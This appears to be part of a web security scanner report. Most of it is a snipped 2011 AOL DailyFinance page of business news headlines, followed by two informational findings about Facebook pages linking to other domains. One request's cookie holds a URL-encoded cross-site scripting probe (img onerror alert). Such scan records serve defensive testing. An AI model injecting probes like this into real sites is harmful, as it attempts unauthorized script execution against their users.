<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'It's probably safe to come out from under your desk now.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/03/pf/saving/caeer_goals.moneymag/index.htm?eref=aol">Put some punch into your career</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Apparently people don't like paying $5 to withdraw their own money from an ATM.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/02/pf/atm_fees_chase/index.htm?eref=aol">Goodbye, $5 ATM fees</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'If you're in the market to sell your home, you probably feel you can't catch a break. Nearly five years into the housing bust, when many experts thought the real estate market would at least have stabilized, sales and prices are still dropping in most of the country.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/02/real_estate/home-sale-strategies.moneymag/index.htm?eref=aol">Your Home: How to sell in tough times</a>
...[SNIP]...
<li>
<a id="newswire-module" target="_blank" onmouseover="javascript:showPop(event,this,'Thinking of spending a weekend in Paris this spring? Think again.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/04/22/pf/airline_fees_rise/index.htm?eref=aol">Airline fees: The $500 surprise</a>
...[SNIP]...
<div class="feedsFooter">

<a target="_blank" href="http://money.cnn.com/index.html">More from CNNMoney</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/I61aGXv_tTw/"
target="_blank">Top After-Hours Movers, Earnings & More (BMC, HNSN, IO, SLV, JDSU, KLIC, MELI, NWSA, SMSI)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/VchhDCUnw90/"
target="_blank">Whole Foods Continues To Shine, Despite Revenue Mix (WFMI)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/xSPsy0oSRKQ/"
target="_blank">Top Earnings Previews For Thursday (ARG, CTL, CVS, DMD, DTV, EP, KFT, PMI, PCLN, V)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/Gpc53FcN3fg/"
target="_blank">Commodities Watch: Gold, Silver Sell-off Continues; US Now Net Exporter of Refined Oil Products; Coffee Prices Slide (GLD, SLV, SBUX, GMCR)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/xWo9SUG82MU/"
target="_blank">POLL: No Dead Bin Laden Photo Release! Is It Fair?</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/dFlfepnKOeE/"
target="_blank">Is Citi Worth $5.60? Or $56 Soon? (C, GS, BAC)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/-zb8Lq7x3zc/"
target="_blank">Oil & Gas Hedging Woes, Devon Energy Falters With Chesapeake (DVN, CHK, APC, APA, OXY)</a>
...[SNIP]...
<li>
<a class="24-7-wallst-tab-rss"
href="http://feedproxy.google.com/~r/247wallst_partners/~3/VyFCCMzEWhQ/"
target="_blank">Alternative Energy Watch: European Headwinds for Solar; New Rules for Biomass Generation in Massachusetts; Bill Gates Pushes Nukes (STP, TSL, YGE, FSLR, MSFT, USU)</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://247wallst.com/" target="_blank">More from 24/7 Wall St.</a>
...[SNIP]...
<div class="genTabHidden"><img src="http://o.aolcdn.com/dynamoney/dayfin/i/1-df-loading-spinner.gif"></div>
...[SNIP]...
<span class="spot"><a href="http://www.facebook.com/DailyFinance"><img src="http://o.aolcdn.com/art/ch_pf/follow_facebook" alt="DailyFinance on Facebook" /><br />
...[SNIP]...
<span class="spot"><a href="http://twitter.com/daily_finance"><img src="http://o.aolcdn.com/art/ch_pf/follow_twitter" alt="DailyFinance on Twitter" /><br />
...[SNIP]...
<a href="/to-go/#rss-feeds"><img src="http://o.aolcdn.com/art/ch_pf/follow_rss" alt="DailyFinance RSS Feeds" /><br />
...[SNIP]...
<a href="/to-go/"><img src="http://o.aolcdn.com/art/ch_dailyfinance/togo_logo" alt="DailyFinance To Go" /><br />
...[SNIP]...
</div>
<a href="http://daol.aol.com/software/livemocha?en=cff58f1f-cade-4403-bbab-69d58ca73fc0&sp=20017294-689d-478a-bbf4-e5fbb2d3820c&fr=beef7de7-49fa-469f-9134-de66e488858d&de=e72425de-d20a-400b-8124-5f96bcecc75d&it=54e5a3eb-4001-4c2f-9a7a-41b8dfa03796 " title="Live Mocha"><img class="admodule" src="http://o.aolcdn.com/os/news/art/livemocha_ad" alt="Live Mocha" /></a>
...[SNIP]...
<div class="header">
<a href="http://www.cnnmoney.com/" target="_self" class="rsslogos rssimg1" title="CNN Money"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Exxon Mobil wants to tell you something: It pays taxes. A lot of them.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/news/companies/exxon_oil_taxes/index.htm?eref=aol">EXXON: WE PAY PLENTY IN TAXES</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Stocks ended in the red Wednesday, as disappointing reports on jobs and the services sector weighed on investors.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/markets/markets_newyork/index.htm?eref=aol">Stocks stumble on economic jitters</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'General Motors has recalled 154,112 Chevrolet Cruze models in North America to inspect for proper installation of the steering wheel, the automaker said late Wednesday.')" onmouseout="javascript:hidePop()" href="http://money.cnn.com/rssclick/2011/05/04/autos/cruz_recall/index.htm?eref=aol">GM recalls more than 150,000 Cruzes</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.cnnmoney.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.ft.com/home/us" target="_self" class="rsslogos rssimg2" title=""></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","`")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/18b96d66-76a2-11e0-bd5d-00144feabdc0.html?ftcamp=rss">Warner Music nears sale to Blavatnik</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","`")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/943fd622-76a3-11e0-bd5d-00144feabdc0.html?ftcamp=rss">News Corp in push to talk down BSkyB price</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'%description.value.strip_tags().regex("/'/","`")%')" onmouseout="javascript:hidePop()" href="http://www.ft.com/cms/s/0/2dfcc23c-7697-11e0-bd5d-00144feabdc0.html?ftcamp=rss">Chrysler raising billions to repay loans</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.ft.com/home/us" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.cnbc.com/" target="_blank"><img src="http://o.aolcdn.com/art/channels/0f/06/483210ef-000fc-069da-400cb8e1" alt="CNBC" title="CNBC"/></a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.cnbc.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://aol.smartmoney.com/" target="_self"><img src="http://o.aolcdn.com/art/channels/0f/04/46a620a1-0021f-01a0a-400cb8e1" alt="Smart Money" title="Smart Money"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           After a rough start this year, these emerging markets have come roaring back.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/investing/stocks/5-reasons-brics-are-back-1303831340166/?cid=sm_dailyfinanceRSS">5 Reasons BRICs Are Back (Longshot)</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           Communities in vacation hotspots are turning to a new tactic for wooing residents this summer.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/personal-finance/retirement/test-drive-your-retirement-home-1304011789458/?cid=sm_dailyfinanceRSS">Test Drive Your Retirement Home</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
           Investors greeted lowered U.S. outlook in odd but telling ways.
           ')" onmouseout="javascript:hidePop()" href="http://www.smartmoney.com/investing/stocks/4-surprise-reactions-to-sp-treasury-slam-1303161672034/?cid=sm_dailyfinanceRSS">4 Surprise Reactions to S&P Treasury...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://aol.smartmoney.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.foxbusiness.com/index.html" target="_self" class="rsslogos rssimg5" title="Fox Business"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Geithner: Higher gas prices not translating into inflation')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677755/the-need-to-boost-oil-drilling-in-us/?playlist_id=87070">The Need to Boost Oil Drilling in U.S.</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Gerri`s Two Cents: Bin Laden photos')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677647/white-house-announces-it-wont-release-bin-laden-pictures/?playlist_id=87069">White House Announces it Won't Release...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Back of the Envelope: Job market still in crisis')" onmouseout="javascript:hidePop()" href="http://video.foxbusiness.com/v/4677646/job-market-weighing-on-economic-recovery/?playlist_id=87069">Job Market Weighing on Economic Recovery</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.foxbusiness.com/index.html" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.engadget.com/" target="_self" class="rsslogos rssimg6" title="Engadget"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'
It may bear closer resemblance to an upright dog than a human (check out those ears!), but POLYRO here is the least frightening example of a do-it-yourself robot that we`ve seen to date. We`re not sold on the humanoid`s name as an acronym (oPen sOurce friendLY RObot), and the instructions and assembly photos are rather hit or miss, but this rollin` rover definitely scores some points for looks. Prepare to get down and dirty with a jigsaw, drill press, and "safety equipment," before the latest addition to your family is ready to roll across the living room floor on its iRobot base. Instructables has posted a full shopping list, including a 10.1-inch netbook, ROS (Robot OS), and a Kinect. If you`re feeling brave, clear some time in the schedule and space in the garage after heading over to our source link.POLYRO humanoid robot can be built by you, looks more like K-9 than C-3PO originally appeared on Engadget on Wed, 04 May 2011 20:24:00 EDT. Please see our terms for use of feeds.Permalink CrunchGear, Plastic Pals  |  Instructables  | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/polyro-humanoid-robot-can-be-built-by-you-looks-more-like-k-9-t/">POLYRO humanoid robot can be built by...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'

It`s not often that we get word of a new gadget by way of an SEC filing, but Barnes & Noble has broken with tradition with an 8-K report that reveals its intentions to introduce a new e-reader. The form, filed earlier today, says that the company "indicated it expects to make an announcement on May 24, 2011 regarding the launch of a new eReader device," and goes on to say that the form was filed "solely to satisfy the requirements of Regulation FD." Said regulation was instated back in 2000 to address concerns over insider trading. All that sounds good to us, but we wish there was a clause that required them to include a spec sheet. Considering the Nook Color just got Froyo, is it possible we`ll be seeing a Honeycomb version come the 24th? It looks like we`ll just have to wait and see.Barnes & Noble to release new e-reader, according to securities filing originally appeared on Engadget on Wed, 04 May 2011 20:12:00 EDT. Please see our terms for use of feeds.Permalink   |  Barnes & Noble  | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/barnes-and-noble-to-release-new-e-reader-according-to-securities/">Barnes & Noble to release new...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'The FCC may be sticking with its target of 4Mbps broadband for everyone in the United States, but it looks like the CRTC thinks Canada can do one (megabit) better. The regulatory agency has just set its own target of 5Mbps download speeds and 1 Mbps upload speeds for all Canadians -- a goal that it says must be met by 2015. Those speeds, the agency notes, must be actual speeds not advertised ones, although it`s not yet going as far as to declare internet access a basic service to ensure that happens. The CRTC says instead that it prefers to rely on "market forces" for the time being, rather than subsidies that would come with such a declaration. Of course, while 5Mbps is faster than the FCC`s target, it`s still well short of some of the more ambitious broadband goals of other countries around the world -- Finland, for instance, has already declared that 1Mbps broadband a legal right and is promising to bring 100Mbps speeds to everyone by 2015.CRTC sets target of 5Mbps broadband for all Canadians by 2015 originally appeared on Engadget on Wed, 04 May 2011 18:57:00 EDT. Please see our terms for use of feeds.Permalink   |  CBC  | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.engadget.com/2011/05/04/crtc-sets-target-of-5mbps-broadband-for-all-canadians-by-2015/">CRTC sets target of 5Mbps broadband for...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.engadget.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.huffingtonpost.com/" target="_self"><img src="http://o.aolcdn.com/art/ch_dailyfinance/huff_po_logo" alt="Huffington Post" title="Huffington Post"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'WASHINGTON -- Freddie Mac reported earning $676 million in the January-March quarter, the first time the bailed-out mortgage giant has posted a quarterly gain in...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/freddie-mac-attributes-fi_n_857789.html">Freddie Mac Posts First Quarterly Gain...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'NEW YORK -- Noelle Aldrich never planned on moving back in with her parents after graduating from college. Aldrich will graduate from Oklahoma Baptist University...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/youth-optimism-historic-low-poll_n_857750.html">Optimism In Decline: Hope For...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'WASHINGTON -- Republicans don............t even want public advocate Elizabeth Warren to head a watered-down Consumer Financial Protection Bureau. At least that............s what Democrats tried to...')" onmouseout="javascript:hidePop()" href="http://www.huffingtonpost.com/2011/05/04/gop-blocks-elizabeth-warren-cfpb_n_857780.html">GOP Blocks Bid To Make Elizabeth Warren...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.huffingtonpost.com/" target="_blank"><b>
...[SNIP]...
<div class="header">
<a href="http://www.walletpop.com/" target="_self" class="rsslogos rssimg8" title=" WalletPop"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Food, Recalls, Consumer Ally, In the NewsTaylor Farms Pacific Inc. recalled grape tomatoes that were used in ready-made salads for Walmart, Safeway, Sam`s Club, Albertsons and other stores because they may be contaminated with salmonella, said the U.S. Food and Drug Administration.

So far, no one has gotten sick from eating the tomatoes, the FDA said. Salmonella can cause a potentially life-threatening infection in the very young, elderly or those with weakened immune systems. Even normally healthy people can suffer from diarrhea, nausea and fever.

Taylor Farms said it was notified by its supplier, Six L`s, that the grape tomatoes were part of a recall the Florida company announced because of possible salmonella contamination. Included in that recall are Cherry Berry grape tomatoes with a lot code DW-H packed in either clam-shell containers or 20-pound cardboard boxes. Those tomatoes were sold in stores and served in restaurants in Alabama, California, Florida, Georgia, Michigan, New Jersey, New York, North Carolina, Pennsylvania, South Carolina, and also Canada.Continue reading Grape Tomatoes in Ready-Made Salads Recalled Over Salmonella FearsGrape Tomatoes in Ready-Made Salads Recalled Over Salmonella Fears originally appeared on WalletPop on Wed, 04 May 2011 16:15:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/grape-tomatoes-in-ready-made-salads-recalled-over-salmonella-fea/">Grape Tomatoes in Ready-Made Salads...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Amazon.com wants to get consumers in the habit of shopping its private sales.

So the online retail giant has launched a new members-only fashion site dubbed MYHABIT.com, offering up to 60% off what it calls "hand-picked selections" from "sought-after brands." With this move, Amazon.com is throwing its hat into the private or flash sale ring.

The hot, private sale websites -- the modern day, online version of the sample sale -- such as Gilt Groupe and Rue La La, aim to deliver the hottest designer looks at up to 80% off retail prices. The discounts are usually offered for just 36 to 48 hours on upscale, designer merchandise in limited quantities.Continue reading Amazon`s MYHABIT.com Joins the Private Sale Website ClubAmazon`s MYHABIT.com Joins the Private Sale Website Club originally appeared on WalletPop on Wed, 04 May 2011 15:00:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/amazons-myhabit-com-joins-the-private-sale-website-club/">Amazon's MYHABIT.com Joins the Private...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Recalls, Consumer Ally, In the NewsBristol-Myers Squibb recalled one lot of its blood thinner medicine Coumadin after tests showed the tablets could be more potent than the dosage, said the U.S. Food and Drug Administration (FDA).

Coumadin -- also known as warfarin sodium -- is prescribed to treat and prevent blood clots, and to lower the risk of heart attacks and strokes. However, too much of the active ingredient in the medication means there would be an increased risk of bleeding, the FDA said.

Consumers should talk to their doctors immediately if they experience any problems, including pain, swelling, headache and dizziness, unusual bruising, nosebleeds and bleeding from cuts that take a long time to stop.Continue reading One Lot of Coumadin Recalled Over Potency FearsOne Lot of Coumadin Recalled Over Potency Fears originally appeared on WalletPop on Wed, 04 May 2011 13:30:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.walletpop.com/2011/05/04/one-lot-of-coumadin-recalled-over-potency-fears/">One Lot of Coumadin Recalled Over...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.walletpop.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://smallbusiness.aol.com/" target="_self" class="rsslogos rssimg9" title="AOL Small Business"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: News, International Business, Consumer Products & Services, Retail, Show BusinessBritish-based Illuminum ran out of its White Gardenia Petals fragrance within moments and now boasts a two-week international waiting list. Permalink | Email this | Linking Blogs | Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/small-business-sells-out-of-kate-middletons-wedding-perfume/">Small Business Sells Out of Kate...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: News, Management, Human ResourcesThough they tend to be older than most of their colleagues, 61 percent of boomers say their age isn`t an issue at work, and 25 percent consider their age an advantage. Permalink | Email this | Linking Blogs | Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/baby-boomers-say-their-age-is-an-asset-in-workplace/">Baby Boomers Say Their Age is an Asset...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'Filed under: Tip of the DayBe realistic with your business idea. Is this something that there is really a need for? Would you buy this product or service? When I started Mr. Handyman of Richmond 10 years ago, it was because I had trouble getting contractors to do small jobs at my house. They weren`t interested in small things. There was definitely a need for this sort of service. Permalink | Email this | Linking Blogs | Comments')" onmouseout="javascript:hidePop()" href="http://smallbusiness.aol.com/2011/05/04/choose-the-right-franchise/">Choose the Right Franchise</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://smallbusiness.aol.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://www.luxist.com/" target="_self"><img src="http://o.aolcdn.com/art/channels/0e/05/486d02a8-0024a-02bbb-400cb8e1" alt="Luxist" title="Luxist"/></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,'

Last year my favorite new Fortis watch was the Spaceleader. The futuristic chronograph watch was designed by the Volkswagen Design team and offered as a special limited edition of 2,012 pieces. I first wrote about the Fortis Spaceleader watch here. For 2011 Fortis is offering two additional limited edition versions of the Spaceleader Chronograph. Each have white dials and are great looking in a sort of "Omega Speedmaster evolved" sense. One model has a white rubber strap and the other models has a black rubber strap. The case is in polished steel and is "wrapped" by the strap structure. Fortis and Volkswagen really hit on a good design and I think these new color variations will be just as popular as the original Spaceleader watch. Inside the watches are Swiss ETA Valjoux 7750 automatic movements. Look for these timepieces soon.

Ariel Adams publishes the wrist watch reviews site aBlogtoRead.com.

Gallery: Fortis Spaceleader Volkswagen Design White WatchFiled under: Timepieces / WatchesFortis Spaceleader Volkswagen Design White Watch originally appeared on Luxist on Wed, 04 May 2011 12:03:00 EST. Please see our terms for use of feeds.Permalink | Email this | Comments')" onmouseout="javascript:hidePop()" href="http://www.luxist.com/2011/05/04/fortis-spaceleader-volkswagen-design-white-watch/">Fortis Spaceleader Volkswagen Design...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.luxist.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://realestate.aol.com/" target="_self" class="rsslogos rssimg11" title="AOL Real Estate"></a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/gossip-girls-kelly-rutherford-lists-west-hollywood-home-at-1-3/">Gossip Girl's Kelly Rutherford Lists in...</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/natural-disasters-and-terror-plots-what-home-insurance-covers/">Natural Disasters and Terror Plots:...</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/blog/2011/05/04/madonnas-childhood-home-lists-for-49k/">Madonna's Childhood Home Lists for $49K</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://realestate.aol.com/" target="_blank"><b>
...[SNIP]...
<div class="header">

<a href="http://www.aolnews.com/" target="_self" class="rsslogos rssimg12" title="AOL News"></a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/first-bin-laden-now-lex-luthor-evil-doers-return-historic-supe/">First Bin Laden, Now Lex Luthor:...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/man-plows-into-alaskan-brewing-company-steals-beer/">Man Plows Into Alaskan Brewing Company,...</a>
...[SNIP]...
<li><a onmouseover="javascript:showPop(event,this,' ...')" onmouseout="javascript:hidePop()" href="http://www.aolnews.com/2011/05/04/uma-thurman-makes-bizarre-tv-ad-for-schweppes/">Uma Thurman Makes Bizarre TV Ad for...</a>
...[SNIP]...
<div class="feedsFooter">
<a href="http://www.aolnews.com/" target="_blank"><b>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/">Small Business</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/starting-a-business/">Start a Business</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/advertising-and-marketing/">Business Marketing</a>
...[SNIP]...
<li><a href="http://smallbusiness.aol.com/category/money/">Business Financing</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/hoteldeals/">Hotel Deals</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/CelebrityRealEstate/">Celebrity Real Estate</a>
...[SNIP]...
<li><a href="http://www.luxist.com/tag/condo+auction/">Condo Auctions</a>
...[SNIP]...
<li><a href="http://realestate.aol.com/">Real Estate</a>
...[SNIP]...
<li><a href="http://www.rentedspaces.com/">Apartments</a>
...[SNIP]...
<li><a href="http://www.housingwatch.com/">Housing Trends</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/debt/">Debt</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/category/fraud/">Fraud</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/category/insurance/">Insurance</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/loans/">Loans</a></li>

       <li><a target="_blank" href="http://www.walletpop.com/taxes/">2010 Income Taxes</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/">Taxes</a></li>
       <li><a target="_blank" href="http://www.walletpop.com/taxes/advice/">Tax Advice</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/basics/">Tax Basics</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/forms/">Tax Forms</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/credit/">Tax Credit</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/taxes/online/">Online Tax Filing</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/college-finance/">College Finance</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/recalls/">Recalls</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/category/retire/">Retirement</a>
...[SNIP]...
<li><a target="_blank" href="http://www.walletpop.com/">Personal Finance</a>
...[SNIP]...
<li><a target="_blank" href="http://247wallst.com/">24/7 Wall St.</a>
...[SNIP]...
<li><a href="http://www.smckids.com/">Secret Millionaires Club</a>
...[SNIP]...
<li><a target="_blank" href="http://www.luxist.com/">Luxury News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.parentdish.com/">ParentDish</a>
...[SNIP]...
<li><a target="_blank" href="http://www.engadget.com/">Tech News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.downloadsquad.com/">Download Squad</a>
...[SNIP]...
<li><a target="_blank" href="http://www.tuaw.com/">TUAW</a></li>
           <li><a target="_blank" href="http://aol.sportingnews.com/">Sports News</a>
...[SNIP]...
<li><a target="_blank" href="http://www.autoblog.com/">Autoblog</a>
...[SNIP]...
<li><a target="_blank" href="http://www.huffingtonpost.com/politics/">Politics News</a>
...[SNIP]...
<li><a target="_blank" href="http://noticias.aol.com/category/latino-news/">Latino News</a>
...[SNIP]...
<li><a target="_blank" href="http://music.aol.com/radioguide/bb">Radio</a>
...[SNIP]...
</a> | <a href="http://about.aol.com/aolnetwork/aol_pp" target="_blank">Privacy Policy</a> | <a href="http://about.aol.com/aolnetwork/trademarks" target="_blank">Trademarks</a>
...[SNIP]...
</a> | <a href="http://advertising.aol.com/brands/dailyfinance" target="_blank">Advertise With Us</a>
...[SNIP]...


<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/df/js/jquery.globalheader-1.3.js&file=/df/js/jquery.globalsearchbox-1.3.js&file=/df/js/df-search0.6.js&file=/df/js/jslib1.5.js&file=/df/smartbox1.7.4.js"></script>
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/feeds_subscribe_en_us.js"></script>
<link rel="stylesheet" type="text/css" href="http://o.aolcdn.com/os/df/css/feeds_subscribe_en_us.css" />
<script type="text/javascript" src="http://o.aolcdn.com/os/df/js/copyRight.js"></script>
...[SNIP]...
</script>

<script src="http://o.aolcdn.com/os_merge/?file=/aol/jquery.getjs-1.0.min.js&file=/aol/jquery.inlinecss-1.0.min.js&file=/aol/jquery.sonar.min.js&file=/aol/jquery.facebooksocial.min.js" type="text/javascript">
...[SNIP]...

16.30. http://www.facebook.com/BPAmerica previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/BPAmerica

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/BPAmerica?v=app_116299338448715

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/5skHSErf84s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/fhgSeULDVSk.css
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

GET /BPAmerica?v=app_116299338448715 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

16.31. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783

The response contains the following links to other domains:

http://b.static.ak.fbcdn.net/rsrc.php/v1/yV/r/ecpCmrvFebs.js
http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/GJUfkUG9iLr.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/5HRFtNmxswh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/6x5Oqo2nmb-.css
